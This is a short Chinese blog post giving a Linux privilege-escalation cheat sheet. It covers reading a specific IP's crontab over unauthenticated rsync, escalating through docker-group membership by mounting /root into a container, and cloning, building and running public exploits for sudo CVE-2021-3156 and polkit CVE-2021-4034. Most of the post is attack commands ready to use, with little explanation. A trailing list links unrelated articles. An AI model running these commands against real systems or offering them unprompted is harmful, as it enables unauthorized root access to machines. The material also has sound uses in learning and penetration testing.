当前位置: 首页 > article >正文

linux提权-RSYNC未授权访问覆盖

article 2024/11/14 20:55:21
一.RSYNC未授权访问覆盖提权

rsync rsync://39.101.162.36:873/src/etc/crontab ./,读取目标定时任务

cat crontab 查看定时任务

读取:

二.docker组用户提权

需要用户在docker组

docker run -v /root:/mnt -it alpine

原理:-v将容器外部的目录/root挂载到容器内部/mnt,使用-it参数进入容器shell

三.SUDO(CVE-2021-3156)

SUDO:1.8.2-1.8.31p2
SUDO:1.9.0-1.9.5P1

判断:sudoedit -s /

usage报错则未有漏洞

git clone https://github.com/blasty/CVE-2021-3156.git

cd CVE-2021-3156

make

./sudo-hax-me-a-sandwich <target_number>

dpkg -l policykit-1

四.2021-4034

git clone https://github.com/berdav/CVE-2021-4034.git

cd CVE-2021-4034

make

./cve-2021-4034.sh


http://www.kler.cn/a/393465.html

相关文章:

  • 专题十八_动态规划_斐波那契数列模型_路径问题_算法专题详细总结
  • Linux 常用操作指令大揭秘(下)
  • 【MySQL】约束
  • 如何用C#和Aspose.PDF实现PDF转Word工具
  • K8资源之endpoint资源EP资源
  • 「Mac玩转仓颉内测版7」入门篇7 - Cangjie控制结构(下)
  • SQLite Where 子句
  • 【HAProxy08】企业级反向代理HAProxy高级功能之自定义日志格式与IP透传
  • 华为机试笔记
  • LeetCode【0038】外观数列
  • Go 语言已立足主流,编程语言排行榜24 年 11 月
  • 【基于轻量型架构的WEB开发】课程 作业3 Spring框架
  • 前端基础的讲解-JS(10)
  • Scala学习记录,case class,迭代器
  • 如何制作代购系统:从概念到实现
  • 微服务day06
  • 刷算法题(C++)
  • LeetCode【0025】K个一组翻转链表
  • 【工具插件类教学】在 Unity 中使用 iTextSharp 实现 PDF 文件生成与导出
  • Netty实现WebSocket Client三种典型方式
  • 【Springboot】黑马大事件笔记 day1
  • 【go从零单排】HTTP客户端和服务端
  • 群控系统服务端开发模式-应用开发-前端退出功能
  • 丹摩征文活动|FLUX.1 和 ComfyUI:从部署到上手,轻松驾驭!
  • apk反编译修改教程系列-----apk应用反编译中AndroidManifest.xml详细代码释义解析 包含各种权限 代码含义
  • CyclicBarrier复杂场景示例